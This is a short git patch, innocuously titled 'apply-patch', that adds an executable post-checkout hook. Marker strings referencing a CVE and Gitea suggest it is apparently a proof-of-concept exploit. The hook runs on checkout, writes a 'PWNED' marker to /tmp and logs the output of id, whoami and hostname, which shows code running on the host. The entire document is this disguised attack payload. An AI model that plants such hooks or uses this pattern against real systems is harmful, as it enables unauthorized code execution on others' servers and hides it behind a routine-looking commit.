From 7630fdd997a5f25091503d2077f13b130d82639e Mon Sep 17 00:00:00 2001 From: dev81266 Date: Wed, 29 Jul 2026 07:59:01 +0800 Subject: [PATCH] apply-patch --- hooks/post-checkout | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100755 hooks/post-checkout diff --git a/hooks/post-checkout b/hooks/post-checkout new file mode 100755 index 0000000..6c43288 --- /dev/null +++ b/hooks/post-checkout @@ -0,0 +1,6 @@ +#!/bin/sh + +echo PWNED_by_CVE202660004 > /tmp/gitea_pwn_$(date +%s).txt +id >> /tmp/gitea_pwn.txt +whoami >> /tmp/gitea_pwn.txt +hostname >> /tmp/gitea_pwn.txt